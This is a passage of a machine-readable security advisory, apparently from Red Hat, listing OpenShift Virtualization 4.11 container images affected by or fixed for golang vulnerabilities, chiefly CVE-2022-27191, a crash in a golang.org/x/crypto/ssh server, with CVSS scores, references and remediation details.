"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: regexp: stack exhaustion via a deeply nested expression", }, { cve: "CVE-2022-27191", cwe: { id: "CWE-327", name: "Use of a Broken or Risky Cryptographic Algorithm", }, discovery_date: "2022-03-16T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2064702", }, ], notes: [ { category: "description", text: "A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentication with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: crash in a golang.org/x/crypto/ssh server", title: "Vulnerability summary", }, { category: "other", text: "In OpenShift Container Platform (OCP) the vulnerable golang.org/x/crypto/ssh package is bundled in many components. The affected code is in the SSH server portion that is not used, hence the impact by this vulnerability is reduced. Additionally the OCP installer components, that also bundle vulnerable golang.org/x/crypto/ssh package, are used only during the cluster installation process, hence for already deployed and running OCP clusters the installer components are considered as affected by this vulnerability but not impacted.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-27191", }, { category: "external", summary: "RHBZ#2064702", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064702", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-27191", url: "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", url: "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, ], release_date: "2022-03-15T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crash in a golang.org/x/crypto/ssh server", }, { cve: "CVE-2022-28327", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-04-21T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: 